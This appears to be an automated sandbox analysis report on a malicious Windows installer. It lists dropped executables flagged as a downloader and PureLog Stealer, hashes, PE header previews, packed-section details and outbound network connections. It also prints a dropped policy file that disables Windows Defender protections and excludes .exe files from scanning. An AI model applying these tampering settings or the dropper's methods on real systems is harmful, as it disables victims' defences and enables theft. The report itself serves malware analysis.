Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3828752
Entropy (8bit):	7.950185500817205
Encrypted:	false
SSDEEP:	98304:rm3o0QMznQ6mUOAj4H0KikjBY5fgq/crZN:GmMzQ6eAj4HbjBOIkS
MD5:	2AB891D9C6B24C5462E32A0BAB3D1FEC
SHA1:	4DBB387D2FCE2B47FF3699468590466505BA7554
SHA-256:	6FFD157EB781504EADD72996C2CDBD4881034FFB7F7D2BC4B96D4DAA61FB4D86
SHA-512:	0317A30E9E70D0AC8416F14A91119504FC40E9A72EE34D358741EBF820367ABB3B18E2C64987F6D86D3C4A8952621AEBECA83FA027D66EDB456C749E56D42D89
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........&...u...u...u...t...u...t%..u%C.u...u%C.t...u%C.t...u%C.t...u...t...u...t...u...t...u...u}..u.@.t...u.@.u...u.@.t...uRich...u........................PE..L...r*~f...............'.....j......X h...........@.................................z:...@......................................................................................................................................................... {........................... ..` .r..........................@..@ .&...p......................@... ............................@..@ .A...0...0..................@..B.idata..............................@....tls.....................................rsrc...............................@..@.themida..W.........................`....boot.....0.. h...0.................`..`.reloc...............l:................@................................

C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2520576
Entropy (8bit):	7.982924566300698
Encrypted:	false
SSDEEP:	49152:z9hJ4NktFt2HtfCdk11Twmv7HjUYqG/jZ2h1gd6X0145:/WNkLEJC8T9LnqG70h1fX014
MD5:	B58A3998F5CE749FD2DD6B8651FDE46C
SHA1:	94BAC5909D2B5F2313D810F04587DB3C67C9DD5A
SHA-256:	7D094695351ABC8285AEA7A0612764CA1D12EF7B0C44ACA25ED560AC1D407C3D
SHA-512:	DB074390FE7B8DFA26A10D0DCCA56F3D66D72EBA96DDC6B7650E7B8C45E0DE58805ABE43D8F93E3291687FF075D900676552D6A3F7AC3C7B2D388C9F52111DA4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L.....uf......................!.....$.............@.......................... ............@... .. .... .. .......... ...................................................................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............y...#..(..................@....data....P".....B"..4..............@...........................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10564608
Entropy (8bit):	7.969573483347947
Encrypted:	false
SSDEEP:	196608:7PyWqZApuYuBDhM7GsHkE5j5hKAbsZ2i0zdKRVZ6FspAE5EFH73AUYR:7aWNRuBDZsEChnK2VziVZdu3h8
MD5:	3B24971C5FEF776DB7DF10A769F0857A
SHA1:	AB314DDF208EF3E8D06F2F5E96F0F481075DE0F4
SHA-256:	0D990BEDAC4696A67AD46DBC686750086F72F4795ED8A6121782BA3B0DC736B5
SHA-512:	F70DCCD6FD95516EAC21B0CC30C70FB5F17C3C8F1F3B28FE3BDAEC6053C2DE53DAF68CAF422DEA8861E4AB84F3DD7BE36965C6998C1380DBF2A05A2A74B36B28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....2pf..........#.................:..........@.......................................... ...................................................\|.<............M..`*...........................................M}.(....K..8............@.. ............................text...v~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...a%......................... ..`.text1..X....@......................@....text2..`'...P...(..................`..h.rsrc...............................@..@........................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7619942
Entropy (8bit):	7.996924391173374
Encrypted:	true
SSDEEP:	196608:91O9+4X1X5mPjXThLUJpEFKBzppdvKHL+6jlHj/HYeDA7ok5oge:3O9+4lXylL+sKBz3dv6HtzYCNme
MD5:	CB7CC0288990AB8DD4F1200D372A6A92
SHA1:	4791673A1535702F979AFA3372273535BD7C7365
SHA-256:	F8E840590292585AF7CF3A8C0902A30042CD23C05E01688A4641A7CA7E7343B9
SHA-512:	D7320620DF16527CACB294A4BFC4837C850A9866148AE5C76A9958EF24F0EF243DD305B99D3850AFD007C3653140E6C3A5148832B73A463761F85DB5FB19A756
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7636477
Entropy (8bit):	7.996918619729268
Encrypted:	true
SSDEEP:	196608:91Oqr2K/o4XJ8s0LZ3nyXvqcdWitz35+auw:3OsTJ/4FyXv1Ftzkg
MD5:	3821B6AD2BE5C1F137F798889C75B8FC
SHA1:	DD1112DFD70BC910C101D03BFA7CF73C4DCB5163
SHA-256:	A5B2E1710D105CAFBF8D3005D629EE8D6184F9F2CEAAB59ACE04DF1195B10B8A
SHA-512:	C853DCBDC88637AEEFBFFDB822E15B46A0A9710612E8BBC06A84CDB8370707EB32693215DC055363AB262DA41DADD0B036A2A6C8C8D884452AF0021957E8C35B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\pYPeUajku47jJmxh1FdbLdJs.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	HTML document, ASCII text, with very long lines (6927)
Category:	dropped
Size (bytes):	504885
Entropy (8bit):	5.371213204387024
Encrypted:	false
SSDEEP:	12288:na/Eq7ktwIB8rIwJ0rAmv8HahDwao/pCBpdwqM0eulJvBnI76Wq:n8EqRahDdQCBpdwqM0eulNL
MD5:	80D2A0E4AD5B5AD46C4EADF408C6399A
SHA1:	3EF9E11AEEDB04F8A952CD0BEB518C4E980657A4
SHA-256:	7F17B347258C7DE6587E099D1C9ED22336F89BE15377EF64070E4D3433156F3D
SHA-512:	31CCE3DFCE632F4E1D0C329B8B28B1304477BEDEF7F155257043B2FC4D8E58058215B88B49D9FDE79C2B52276E8D4F4274FE6CA9D000049A5FBC49C52704DF9A
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="preconnect" href="https://login.vk.com" />.<link rel="preconnect" href="https://api.vk.com" />.<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error \| VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const

C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4959240
Entropy (8bit):	7.149516507225811
Encrypted:	false
SSDEEP:	98304:QOHXslY4Scfsu4riBS64FsJHk0rxQyeYSKsXW:PHXslY4j4riIoJHkUeyexrXW
MD5:	06333E350E25E29677256D9BE86E4EE1
SHA1:	088FA1F912473C3DFB5AB118B0BC39EC016CF15A
SHA-256:	137A7220FB3CBE605B6C74712AD96DCB1BDEA1C489E9DF159044500CCC23F3C8
SHA-512:	1475FD313EF0CA847EB7921B5BFB017F9B7F9274497DF42FE3FA1477F40C6DA8723EE0C46FA5C3FAC6E9572C47712E1F4412C9460385C8F47117C82BEFDC329D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...% .f..................I...........J.. ... J...@.. ........................K.....o.L...@...................................J.K.... J..............K.......K.....f.J.............................................. ............... ..H............text.....I.. ....I................. ..`.rsrc....... J.......I.............@..@.reloc........K.......K.............@..B..................J.....H........5..\|.......k.....+.j............................................0..B.......+.(..yV(.p..8.....(.... .....:....&8....8........E........8........B+.(..nL~..........6+.(..W/~.......0..H.......+.(.DcX(.p..8......(.... .....:....& ....8....8........E........8......B+.(V..D~..........6+.(...\~.......0..........+.(..Ij ........8........E....O.......y.......^...8J...(.... .....:....&8....s......... ....8....s......... .....9....& ....8....s.........8....s......... .....

C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8077824
Entropy (8bit):	6.5009378741766355
Encrypted:	false
SSDEEP:	49152:P8FC9tZ1LK9QkVNdZEOto3XOREES2CG9LlPJHzPihufFRDiLYDEwjB5EtC0D4DAh:UuG9QcnhnLxHmhYFBEtCHi1mK
MD5:	2BC0DB539A8FAB08BF4104EB7F2DE7E7
SHA1:	FF4A5DEFEDB18C93EF815434B40E19B9452CA410
SHA-256:	EC84EC11567566DB3BA9096DF164F0B7A8217D50FFAB16FA3642F8F12D759B04
SHA-512:	FFAEB6C876D2AEDA75B6576D2B307964A7B5330A0AB73352A4C95EF18AC3B1B1BFFF350805553833A754582ED54215337C376BCE0ABD44C117B5D8A0E1468D71
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$."...>{................@.....................................p{...`... .........................................N.... ..X....`...&....w..+.......................................... .w.(....................$..X............................text... !......."..................`.``.data...0g...@...h...&..............@.`..rdata..P.D...3...D...3.............@.`@.pdata...+....w..,....w.............@.0@.xdata..P.....y.......x.............@.0@.bss..........y.......................`..edata..N.............x.............@.0@.idata..X.... ........x.............@.0..CRT....p....@........x.............@.@..tls.........P........x.............@.@..rsrc....&...`...(....y.............@.0..reloc...............(z.............@.0B................................................................................................................................

C:\Windows\Logs\StorGroupPolicy.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	33271
Entropy (8bit):	4.90958909379564
Encrypted:	false
SSDEEP:	768:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrt5X0SHgHgZgZgUgUi/1OkGk1/pprYHHH1k:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrtB
MD5:	A2E3CD10D921ECD65DD9A68EE8586824
SHA1:	5E7F7B90C74293C0CE9856BFDF09255ACF07214A
SHA-256:	AC15947A82B4CB52BC36D9E786C7BE4093564CDA109DD46B1F9DE38F17E8D01B
SHA-512:	9D1847C99296C374C5CBCA5DD282EE6762807B7BF7D45BE1588ACE5F3F42E917E64E1776B50C4E4708DA7EB95676853DE8AD75C0A2CE41031C72211C3BC70C4D
Malicious:	false
Preview:	10/03/2023 7:55:56.00000693:RegEnumKeyExW failed with (259)..10/03/2023 7:55:56.00000693:GP object initialized successfully..10/03/2023 7:55:56.00000756:Deny_All not set for all. Will query other 6 GUIDs..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Deny_All for all devices is being reset..10/03/2023 7:55:56.00000787:Will delete security for disk..10/03/2023 7:55:56.00000787:Volume interface name \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..10/0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	3.310422749310586
Encrypted:	false
SSDEEP:	24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
MD5:	CDFD60E717A44C2349B553E011958B85
SHA1:	431136102A6FB52A00E416964D4C27089155F73B
SHA-256:	0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
SHA-512:	DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
Malicious:	false
Preview:	PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.

C:\Windows\System32\GroupPolicy\gpt.ini

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	127
Entropy (8bit):	5.080093624462795
Encrypted:	false
SSDEEP:	3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsUov:1WsMzYHxbnvEcvgqv
MD5:	8EF9853D1881C5FE4D681BFB31282A01
SHA1:	A05609065520E4B4E553784C566430AD9736F19F
SHA-256:	9228F13D82C3DC96B957769F6081E5BAC53CFFCA4FFDE0BA1E102D9968F184A2
SHA-512:	5DDEE931A08CFEA5BB9D1C36355D47155A24D617C2A11D08364FFC54E593064011DEE4FEA8AC5B67029CAB515D3071F0BA0422BB76AF492A3115272BA8FEB005
Malicious:	true
Preview:	[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=1..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468828804566765
Encrypted:	false
SSDEEP:	6144:5zZfpi6ceLPx9skLmb0f7ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNljDH5S:RZHt7ZWOKnMM6bFpbj4
MD5:	39FC49E5A3A3B4CCAC6C6C6271FC4A5B
SHA1:	ABC35D6435FD4562981769B23720D97BFC657C20
SHA-256:	FE3B5A18314A7950C10C5455225BC9C5DC5957EDA915708435C77166CDA0087B
SHA-512:	8181D75BB31ADE661791035C7DC44369AFA2BA9F377DAFE4FF9C18605EBDEA0CE94D2442E5B1B3A9DD66080F04143CB2E7EB9700E5A7A7CDEA2376443A17EA01
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....................................................................................................................................................................................................................................................................................................................................................^..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.918188873297892
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1719859269.0326595_setup.exe
File size:	4'569'908 bytes
MD5:	00af1a53860550f8db3f1b250436b78a
SHA1:	67dce838cd0e8410ba30b243520dc06f31c1bae6
SHA256:	86ccbff05056433ad05dcc8dfcf5b9b89bda2b2bbbe74a609e1d333f38cee3e4
SHA512:	48737809e446ba33530c716b5b86a218d0eb8f4e51e3c1f9856b89ce3cd663a781fe7166e7736d5005861de811c87c04cfded7d60347284abe4baefc7f488722
SSDEEP:	98304:BmByncbMrvVWTLkWzE/KORxJCFDDuVI+d0l2ETsmV9:nrvVljxGSVXEs+9
TLSH:	45262292288AC1F8C416CBB4D522B8FCB4797F76C9354D67B88A3E06BEF35005D26791
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'.....x......f:K........@.............................P........E...`................................

File Icon


Icon Hash:	0190110141c13121

Static PE Info

General

Entrypoint:	0x1404b3a66
Entrypoint Section:	.vmp<E
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6680FA08 [Sun Jun 30 06:24:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	448b6888b26145ced7ce018aab459303

Entrypoint Preview

Instruction
push ebp
pushfd
dec eax
mov ebp, 95BA4A17h
sbb dword ptr [8D48A6BCh], edi
lodsb
sub eax, EB89DD2Dh
add bp, bp
inc eax
sub ch, FFFFFFB9h
dec eax
mov ebp, dword ptr [esp+08h]
dec eax
mov dword ptr [esp+08h], 2301E080h
push dword ptr [esp+00h]
popfd
dec eax
lea esp, dword ptr [esp+08h]
call 00007F35B8BA7CDAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47cdd8	0xb4	.vmp<E
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x817000	0x1dbd3	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x80a630	0xa23c	.vmp<E
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x815000	0x1588	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x468e50	0x28	.vmp<E
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x80a4f0	0x140	.vmp<E
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3df000	0xa8	.vmp<E
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11f28e	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x121000	0x32792	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x154000	0x84c8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x15d000	0x75fc	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x165000	0x1f4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.vmp<E	0x166000	0x2783cc	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp<E	0x3df000	0xae8	0xc00	2f867c281054792345db8b91c6f604db	False	0.030598958333333332	data	0.16022467334373525	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp<E	0x3e0000	0x43486c	0x434a00	f69e0e1163d3d6f73a6f69464863a15d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x815000	0x1588	0x1600	e67213e685399fbe5ac1209ac766b388	False	0.19921875	GLS_BINARY_LSB_FIRST	5.478586246444464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x817000	0x1dbd3	0x1dc00	4e82a772a8196e9a503d76055f107ea5	False	0.31263950892857145	data	4.826271643270262	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x817348	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m			0.5726950354609929
RT_ICON	0x8177b0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.38109756097560976
RT_ICON	0x818858	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m			0.3184647302904564
RT_ICON	0x81ae00	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m			0.2646433632498819
RT_ICON	0x81f028	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m			0.1819620253164557
RT_ICON	0x82f850	0x35d8	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9586477074869414
RT_ICON	0x832e28	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5675675675675675
RT_ICON	0x832f50	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4486994219653179
RT_ICON	0x8334b8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4637096774193548
RT_ICON	0x8337a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.3935018050541516
RT_GROUP_ICON	0x834048	0x5a	data			0.7444444444444445
RT_GROUP_ICON	0x8340a8	0x3e	data	English	United States	0.8548387096774194
RT_VERSION	0x8340e8	0x4f4	data	English	United States	0.28785488958990535
RT_MANIFEST	0x8345e0	0x5f3	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4261326329612607

Imports

DLL	Import
KERNEL32.dll	InitializeCriticalSectionEx
USER32.dll	GetCursorPos
ADVAPI32.dll	RegCloseKey
SHELL32.dll	SHGetFolderPathA
ole32.dll	CoCreateInstance
OLEAUT32.dll	VariantClear
KERNEL32.dll	GetSystemTimeAsFileTime
KERNEL32.dll	HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 00:04:54.038805962 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:04:54.038805962 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:04:54.320023060 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:04:57.940321922 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:04:58.112948895 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:04:58.113033056 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:04:58.113224030 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:04:58.120665073 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:04:59.024328947 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:04:59.047647953 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:04:59.047689915 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.047758102 CEST	49711	443	192.168.2.6	104.26.9.59
